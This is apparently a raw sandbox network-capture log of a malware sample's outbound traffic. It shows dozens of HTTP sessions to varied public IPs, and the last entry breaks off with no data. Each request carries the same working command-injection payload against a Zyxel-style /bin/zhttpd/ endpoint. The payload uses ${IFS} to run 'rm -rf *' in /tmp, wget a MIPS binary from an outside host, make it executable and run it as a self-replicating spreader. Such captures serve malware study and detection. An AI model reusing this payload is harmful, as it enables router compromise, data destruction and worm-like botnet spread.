                                        Mar 31, 2024 09:21:28.967271090 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5072192.168.2.234901683.162.239.119443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.967324972 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5073192.168.2.235920697.180.211.211443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.967370033 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5074192.168.2.233301248.218.3.210443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.967411041 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5075192.168.2.2358174123.9.14.152443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.967467070 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5076192.168.2.236059865.176.22.116443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.967514992 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5077192.168.2.234233248.29.82.154443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.967581034 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5078192.168.2.2349676212.211.155.187443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.967622042 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5079192.168.2.2358900158.223.131.107443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.967700005 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5080192.168.2.235187688.229.220.153443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.967739105 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5081192.168.2.2353378176.74.235.140443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.967796087 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5082192.168.2.2357946124.177.41.160443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.967828989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5083192.168.2.2343214152.229.184.120443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.967899084 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5084192.168.2.2358318140.236.227.9443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.967938900 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5085192.168.2.2359120151.215.92.139443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.967983007 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5086192.168.2.2335530220.87.237.9443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.968027115 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5087192.168.2.2342256106.8.135.168443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.968071938 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5088192.168.2.2356568114.146.164.172443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.968112946 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5089192.168.2.233948020.81.142.206443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.968183041 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5090192.168.2.234638614.14.108.11443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.968225002 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5091192.168.2.234267481.36.120.168443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.968285084 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5092192.168.2.2339116184.15.97.130443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.968316078 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5093192.168.2.2350586122.52.121.182443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.968374014 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5094192.168.2.2355794190.127.82.139443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.968425989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5095192.168.2.2337532205.18.179.26443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.968468904 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5096192.168.2.2347666178.206.157.68443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.968519926 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5097192.168.2.234825439.105.88.37443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.968543053 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5098192.168.2.234907883.167.152.105443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.968595982 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5099192.168.2.234889873.139.79.247443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.968651056 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5100192.168.2.2334030140.67.153.179443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.968686104 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5101192.168.2.2335334113.56.170.118443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.968735933 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5102192.168.2.234795037.148.234.177443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.968800068 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5103192.168.2.2345550106.169.8.184443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.968844891 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5104192.168.2.234610887.169.184.139443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.968888998 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5105192.168.2.2340400180.234.228.6443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.968941927 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5106192.168.2.2337614194.133.202.132443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.968978882 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5107192.168.2.234051482.91.74.214443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.969052076 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5108192.168.2.2360336188.90.216.103443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.969079971 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5109192.168.2.2356154150.180.10.26443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.969139099 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5110192.168.2.2351484148.251.250.61443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.969187975 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5111192.168.2.233856253.185.199.109443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.969237089 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5112192.168.2.2359870156.46.237.36443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.969280958 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5113192.168.2.2339132146.244.205.214443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.969336987 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5114192.168.2.2334668168.228.191.247443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.969377995 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5115192.168.2.233280239.71.112.114443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.969435930 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5116192.168.2.2352018136.74.25.18443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.969491959 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5117192.168.2.234314689.215.205.24443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.969522953 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5118192.168.2.2345348185.180.77.115443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.969568968 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5119192.168.2.236095451.156.30.170443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.969621897 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5120192.168.2.234473048.139.211.160443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.969654083 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5121192.168.2.2340942101.140.27.117443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.969726086 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5122192.168.2.23609324.126.193.3443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.969764948 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5123192.168.2.234538824.220.121.140443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.969814062 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5124192.168.2.2345166139.245.242.33443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.969881058 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5125192.168.2.2353584114.164.139.177443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.969928026 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5126192.168.2.234306061.243.198.237443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.969971895 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5127192.168.2.235675671.172.121.53443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.970033884 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5128192.168.2.235681017.226.243.7443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.970071077 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5129192.168.2.235147063.67.46.235443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.970138073 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5130192.168.2.23544701.185.170.126443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.970165014 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5131192.168.2.2346806193.72.113.80443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.970222950 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5132192.168.2.2350124166.177.190.121443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.970282078 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5133192.168.2.2347692206.217.29.50443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.970320940 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5134192.168.2.233384267.18.44.28443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.970386982 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5135192.168.2.2346514206.63.29.163443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.970422983 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5136192.168.2.2357040165.85.63.203443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.970457077 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5137192.168.2.234057474.231.246.142443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.970506907 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5138192.168.2.235967682.128.75.150443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:28.970551968 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5139192.168.2.2335664120.231.169.215443
                                        TimestampBytes transferredDirectionData
